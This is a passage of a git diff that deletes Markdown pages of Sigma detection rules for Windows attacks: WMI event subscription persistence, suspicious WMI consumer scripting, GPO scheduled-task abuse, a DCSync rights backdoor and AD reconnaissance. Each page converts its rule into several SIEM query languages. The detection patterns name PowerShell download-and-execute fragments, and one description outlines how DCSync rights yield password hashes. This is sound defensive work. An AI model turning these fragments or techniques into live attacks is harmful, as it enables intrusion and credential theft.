-((event_id="8" SourceImage IN ["*\\bash.exe", "*\\cvtres.exe", "*\\defrag.exe", "*\\dnx.exe", "*\\esentutl.exe", "*\\excel.exe", "*\\expand.exe", "*\\explorer.exe", "*\\find.exe", "*\\findstr.exe", "*\\forfiles.exe", "*\\git.exe", "*\\gpupdate.exe", "*\\hh.exe", "*\\iexplore.exe", "*\\installutil.exe", "*\\lync.exe", "*\\makecab.exe", "*\\mDNSResponder.exe", "*\\monitoringhost.exe", "*\\msbuild.exe", "*\\mshta.exe", "*\\msiexec.exe", "*\\mspaint.exe", "*\\outlook.exe", "*\\ping.exe", "*\\powerpnt.exe", "*\\powershell.exe", "*\\provtool.exe", "*\\python.exe", "*\\regsvr32.exe", "*\\robocopy.exe", "*\\runonce.exe", "*\\sapcimc.exe", "*\\schtasks.exe", "*\\smartscreen.exe", "*\\spoolsv.exe", "*\\tstheme.exe", "*\\userinit.exe", "*\\vssadmin.exe", "*\\vssvc.exe", "*\\w3wp.exe*", "*\\winlogon.exe", "*\\winscp.exe", "*\\wmic.exe", "*\\word.exe", "*\\wscript.exe"])  -(SourceImage="*Visual Studio*"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*8)(?=.*(?:.*.*\bash\.exe|.*.*\cvtres\.exe|.*.*\defrag\.exe|.*.*\dnx\.exe|.*.*\esentutl\.exe|.*.*\excel\.exe|.*.*\expand\.exe|.*.*\explorer\.exe|.*.*\find\.exe|.*.*\findstr\.exe|.*.*\forfiles\.exe|.*.*\git\.exe|.*.*\gpupdate\.exe|.*.*\hh\.exe|.*.*\iexplore\.exe|.*.*\installutil\.exe|.*.*\lync\.exe|.*.*\makecab\.exe|.*.*\mDNSResponder\.exe|.*.*\monitoringhost\.exe|.*.*\msbuild\.exe|.*.*\mshta\.exe|.*.*\msiexec\.exe|.*.*\mspaint\.exe|.*.*\outlook\.exe|.*.*\ping\.exe|.*.*\powerpnt\.exe|.*.*\powershell\.exe|.*.*\provtool\.exe|.*.*\python\.exe|.*.*\regsvr32\.exe|.*.*\robocopy\.exe|.*.*\runonce\.exe|.*.*\sapcimc\.exe|.*.*\schtasks\.exe|.*.*\smartscreen\.exe|.*.*\spoolsv\.exe|.*.*\tstheme\.exe|.*.*\userinit\.exe|.*.*\vssadmin\.exe|.*.*\vssvc\.exe|.*.*\w3wp\.exe.*|.*.*\winlogon\.exe|.*.*\winscp\.exe|.*.*\wmic\.exe|.*.*\word\.exe|.*.*\wscript\.exe))))(?=.*(?!.*(?:.*(?=.*.*Visual Studio.*)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_event_subscription.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_event_subscription.md
deleted file mode 100644
index 05317f0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_event_subscription.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | WMI Event Subscription       |
-|:-------------------------|:------------------|
-| **Description**          | Detects creation of WMI event subscription persistence method |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1084: Windows Management Instrumentation Event Subscription](https://attack.mitre.org/techniques/T1084)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>exclude legitimate (vetted) use of WMI event subscription in your network</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://attack.mitre.org/techniques/T1084/](https://attack.mitre.org/techniques/T1084/)</li></ul>  |
-| **Author**               | Tom Ueltschi (@c_APT_ure) |
-| Other Tags           | <ul><li>attack.t1546.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: WMI Event Subscription
-id: 0f06a3a5-6a09-413f-8743-e6cf35561297
-status: experimental
-description: Detects creation of WMI event subscription persistence method
-references:
-    - https://attack.mitre.org/techniques/T1084/
-tags:
-    - attack.t1084
-    - attack.persistence
-    - attack.t1546.003
-author: Tom Ueltschi (@c_APT_ure)
-date: 2019/01/12
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selector:
-        EventID:
-            - 19
-            - 20
-            - 21
-    condition: selector
-falsepositives:
-    - exclude legitimate (vetted) use of WMI event subscription in your network
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "19" -or $_.ID -eq "20" -or $_.ID -eq "21")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:("19" OR "20" OR "21"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/0f06a3a5-6a09-413f-8743-e6cf35561297 <<EOF
-{
-  "metadata": {
-    "title": "WMI Event Subscription",
-    "description": "Detects creation of WMI event subscription persistence method",
-    "tags": [
-      "attack.t1084",
-      "attack.persistence",
-      "attack.t1546.003"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"19\" OR \"20\" OR \"21\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:(\"19\" OR \"20\" OR \"21\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'WMI Event Subscription'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:("19" "20" "21")
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" (EventCode="19" OR EventCode="20" OR EventCode="21"))
-```
-
-
-### logpoint
-    
-```
-event_id IN ["19", "20", "21"]
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*19|.*20|.*21)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_susp_scripting.md b/Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_susp_scripting.md
deleted file mode 100644
index 8f9778d..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/sysmon_wmi_susp_scripting.md
+++ /dev/null
@@ -1,189 +0,0 @@
-| Title                    | Suspicious Scripting in a WMI Consumer       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious scripting in WMI Event Consumers |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Administrative scripts</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/](https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/)</li><li>[https://github.com/Neo23x0/signature-base/blob/master/yara/gen_susp_lnk_files.yar#L19](https://github.com/Neo23x0/signature-base/blob/master/yara/gen_susp_lnk_files.yar#L19)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Scripting in a WMI Consumer
-id: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0
-status: experimental
-description: Detects suspicious scripting in WMI Event Consumers
-author: Florian Roth
-references:
-    - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/
-    - https://github.com/Neo23x0/signature-base/blob/master/yara/gen_susp_lnk_files.yar#L19
-date: 2019/04/15
-tags:
-    - attack.t1086
-    - attack.execution
-    - attack.t1059.005
-logsource:
-    product: windows
-    service: sysmon
-detection:
-    selection:
-        EventID: 20
-        Destination:
-            - '*new-object system.net.webclient).downloadstring(*'
-            - '*new-object system.net.webclient).downloadfile(*'
-            - '*new-object net.webclient).downloadstring(*'
-            - '*new-object net.webclient).downloadfile(*'
-            - '* iex(*'
-            - '*WScript.shell*'
-            - '* -nop *'
-            - '* -noprofile *'
-            - '* -decode *'
-            - '* -enc *'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - Administrative scripts
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "20" -and ($_.message -match "Destination.*.*new-object system.net.webclient).downloadstring(.*" -or $_.message -match "Destination.*.*new-object system.net.webclient).downloadfile(.*" -or $_.message -match "Destination.*.*new-object net.webclient).downloadstring(.*" -or $_.message -match "Destination.*.*new-object net.webclient).downloadfile(.*" -or $_.message -match "Destination.*.* iex(.*" -or $_.message -match "Destination.*.*WScript.shell.*" -or $_.message -match "Destination.*.* -nop .*" -or $_.message -match "Destination.*.* -noprofile .*" -or $_.message -match "Destination.*.* -decode .*" -or $_.message -match "Destination.*.* -enc .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Microsoft\-Windows\-Sysmon\/Operational" AND winlog.event_id:"20" AND Destination.keyword:(*new\-object\ system.net.webclient\).downloadstring\(* OR *new\-object\ system.net.webclient\).downloadfile\(* OR *new\-object\ net.webclient\).downloadstring\(* OR *new\-object\ net.webclient\).downloadfile\(* OR *\ iex\(* OR *WScript.shell* OR *\ \-nop\ * OR *\ \-noprofile\ * OR *\ \-decode\ * OR *\ \-enc\ *))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/fe21810c-2a8c-478f-8dd3-5a287fb2a0e0 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Scripting in a WMI Consumer",
-    "description": "Detects suspicious scripting in WMI Event Consumers",
-    "tags": [
-      "attack.t1086",
-      "attack.execution",
-      "attack.t1059.005"
-    ],
-    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"20\" AND Destination.keyword:(*new\\-object\\ system.net.webclient\\).downloadstring\\(* OR *new\\-object\\ system.net.webclient\\).downloadfile\\(* OR *new\\-object\\ net.webclient\\).downloadstring\\(* OR *new\\-object\\ net.webclient\\).downloadfile\\(* OR *\\ iex\\(* OR *WScript.shell* OR *\\ \\-nop\\ * OR *\\ \\-noprofile\\ * OR *\\ \\-decode\\ * OR *\\ \\-enc\\ *))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Microsoft\\-Windows\\-Sysmon\\/Operational\" AND winlog.event_id:\"20\" AND Destination.keyword:(*new\\-object\\ system.net.webclient\\).downloadstring\\(* OR *new\\-object\\ system.net.webclient\\).downloadfile\\(* OR *new\\-object\\ net.webclient\\).downloadstring\\(* OR *new\\-object\\ net.webclient\\).downloadfile\\(* OR *\\ iex\\(* OR *WScript.shell* OR *\\ \\-nop\\ * OR *\\ \\-noprofile\\ * OR *\\ \\-decode\\ * OR *\\ \\-enc\\ *))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Scripting in a WMI Consumer'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"20" AND Destination.keyword:(*new\-object system.net.webclient\).downloadstring\(* *new\-object system.net.webclient\).downloadfile\(* *new\-object net.webclient\).downloadstring\(* *new\-object net.webclient\).downloadfile\(* * iex\(* *WScript.shell* * \-nop * * \-noprofile * * \-decode * * \-enc *))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode="20" (Destination="*new-object system.net.webclient).downloadstring(*" OR Destination="*new-object system.net.webclient).downloadfile(*" OR Destination="*new-object net.webclient).downloadstring(*" OR Destination="*new-object net.webclient).downloadfile(*" OR Destination="* iex(*" OR Destination="*WScript.shell*" OR Destination="* -nop *" OR Destination="* -noprofile *" OR Destination="* -decode *" OR Destination="* -enc *")) | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="20" Destination IN ["*new-object system.net.webclient).downloadstring(*", "*new-object system.net.webclient).downloadfile(*", "*new-object net.webclient).downloadstring(*", "*new-object net.webclient).downloadfile(*", "* iex(*", "*WScript.shell*", "* -nop *", "* -noprofile *", "* -decode *", "* -enc *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*20)(?=.*(?:.*.*new-object system\.net\.webclient\)\.downloadstring\(.*|.*.*new-object system\.net\.webclient\)\.downloadfile\(.*|.*.*new-object net\.webclient\)\.downloadstring\(.*|.*.*new-object net\.webclient\)\.downloadfile\(.*|.*.* iex\(.*|.*.*WScript\.shell.*|.*.* -nop .*|.*.* -noprofile .*|.*.* -decode .*|.*.* -enc .*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_GPO_scheduledtasks.md b/Atomic_Threat_Coverage/Detection_Rules/win_GPO_scheduledtasks.md
deleted file mode 100644
index a7cf076..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_GPO_scheduledtasks.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Persistence and Execution at Scale via GPO Scheduled Task       |
-|:-------------------------|:------------------|
-| **Description**          | Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://twitter.com/menasec1/status/1106899890377052160](https://twitter.com/menasec1/status/1106899890377052160)</li><li>[https://www.secureworks.com/blog/ransomware-as-a-distraction](https://www.secureworks.com/blog/ransomware-as-a-distraction)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-| Other Tags           | <ul><li>attack.t1053.005</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Persistence and Execution at Scale via GPO Scheduled Task
-id: a8f29a7b-b137-4446-80a0-b804272f3da2
-description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
-author: Samir Bousseaden
-date: 2019/04/03
-references:
-    - https://twitter.com/menasec1/status/1106899890377052160
-    - https://www.secureworks.com/blog/ransomware-as-a-distraction
-tags:
-    - attack.persistence
-    - attack.lateral_movement
-    - attack.t1053
-    - attack.t1053.005
-logsource:
-    product: windows
-    service: security
-    description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
-detection:
-    selection:
-        EventID: 5145
-        ShareName: \\*\SYSVOL
-        RelativeTargetName: '*ScheduledTasks.xml'
-        Accesses: '*WriteData*'
-    condition: selection
-falsepositives:
-    - if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\SYSVOL" -and $_.message -match "RelativeTargetName.*.*ScheduledTasks.xml" -and $_.message -match "Accesses.*.*WriteData.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\SYSVOL AND RelativeTargetName.keyword:*ScheduledTasks.xml AND Accesses.keyword:*WriteData*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/a8f29a7b-b137-4446-80a0-b804272f3da2 <<EOF
-{
-  "metadata": {
-    "title": "Persistence and Execution at Scale via GPO Scheduled Task",
-    "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale",
-    "tags": [
-      "attack.persistence",
-      "attack.lateral_movement",
-      "attack.t1053",
-      "attack.t1053.005"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\SYSVOL AND RelativeTargetName.keyword:*ScheduledTasks.xml AND Accesses.keyword:*WriteData*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\SYSVOL AND RelativeTargetName.keyword:*ScheduledTasks.xml AND Accesses.keyword:*WriteData*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Persistence and Execution at Scale via GPO Scheduled Task'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5145" AND ShareName.keyword:\\*\\SYSVOL AND RelativeTargetName.keyword:*ScheduledTasks.xml AND Accesses.keyword:*WriteData*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5145" ShareName="\\*\\SYSVOL" RelativeTargetName="*ScheduledTasks.xml" Accesses="*WriteData*")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5145" ShareName="\\*\\SYSVOL" RelativeTargetName="*ScheduledTasks.xml" Accesses="*WriteData*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5145)(?=.*\\.*\SYSVOL)(?=.*.*ScheduledTasks\.xml)(?=.*.*WriteData.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_account_backdoor_dcsync_rights.md b/Atomic_Threat_Coverage/Detection_Rules/win_account_backdoor_dcsync_rights.md
deleted file mode 100644
index c200f8b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_account_backdoor_dcsync_rights.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Powerview Add-DomainObjectAcl DCSync AD Extend Right       |
-|:-------------------------|:------------------|
-| **Description**          | backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>New Domain Controller computer account, check user SIDs witin the value attribute of event 5136 and verify if it's a regular user or DC computer account.</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/menasec1/status/1111556090137903104](https://twitter.com/menasec1/status/1111556090137903104)</li><li>[https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf](https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)</li></ul>  |
-| **Author**               | Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Powerview Add-DomainObjectAcl DCSync AD Extend Right
-id: 2c99737c-585d-4431-b61a-c911d86ff32f
-description: backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync
-    Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer
-status: experimental
-date: 2019/04/03
-author: Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community
-references:
-    - https://twitter.com/menasec1/status/1111556090137903104
-    - https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf
-tags:
-    - attack.credential_access
-    - attack.persistence
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 5136
-        LDAPDisplayName: 'ntSecurityDescriptor'
-        Value|contains: 
-         - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
-         - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'
-         - '89e95b76-444d-4c62-991a-0facbeda640c'
-    condition: selection
-falsepositives:
-    - New Domain Controller computer account, check user SIDs witin the value attribute of event 5136 and verify if it's a regular user or DC computer account.
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "5136" -and $_.message -match "LDAPDisplayName.*ntSecurityDescriptor" -and ($_.message -match "Value.*.*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2.*" -or $_.message -match "Value.*.*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2.*" -or $_.message -match "Value.*.*89e95b76-444d-4c62-991a-0facbeda640c.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"5136" AND LDAPDisplayName:"ntSecurityDescriptor" AND Value.keyword:(*1131f6ad\-9c07\-11d1\-f79f\-00c04fc2dcd2* OR *1131f6aa\-9c07\-11d1\-f79f\-00c04fc2dcd2* OR *89e95b76\-444d\-4c62\-991a\-0facbeda640c*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2c99737c-585d-4431-b61a-c911d86ff32f <<EOF
-{
-  "metadata": {
-    "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right",
-    "description": "backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer",
-    "tags": [
-      "attack.credential_access",
-      "attack.persistence"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5136\" AND LDAPDisplayName:\"ntSecurityDescriptor\" AND Value.keyword:(*1131f6ad\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *1131f6aa\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *89e95b76\\-444d\\-4c62\\-991a\\-0facbeda640c*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"5136\" AND LDAPDisplayName:\"ntSecurityDescriptor\" AND Value.keyword:(*1131f6ad\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *1131f6aa\\-9c07\\-11d1\\-f79f\\-00c04fc2dcd2* OR *89e95b76\\-444d\\-4c62\\-991a\\-0facbeda640c*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Powerview Add-DomainObjectAcl DCSync AD Extend Right'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"5136" AND LDAPDisplayName:"ntSecurityDescriptor" AND Value.keyword:(*1131f6ad\-9c07\-11d1\-f79f\-00c04fc2dcd2* *1131f6aa\-9c07\-11d1\-f79f\-00c04fc2dcd2* *89e95b76\-444d\-4c62\-991a\-0facbeda640c*))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="5136" LDAPDisplayName="ntSecurityDescriptor" (Value="*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*" OR Value="*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*" OR Value="*89e95b76-444d-4c62-991a-0facbeda640c*"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="5136" LDAPDisplayName="ntSecurityDescriptor" Value IN ["*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*", "*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*", "*89e95b76-444d-4c62-991a-0facbeda640c*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*5136)(?=.*ntSecurityDescriptor)(?=.*(?:.*.*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2.*|.*.*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2.*|.*.*89e95b76-444d-4c62-991a-0facbeda640c.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_account_discovery.md b/Atomic_Threat_Coverage/Detection_Rules/win_account_discovery.md
deleted file mode 100644
index 497973f..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_account_discovery.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | AD Privileged Users or Groups Reconnaissance       |
-|:-------------------------|:------------------|
-| **Description**          | Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>if source account name is not an admin then its super suspicious</li></ul>  |
-| **Development Status**   | experimental |
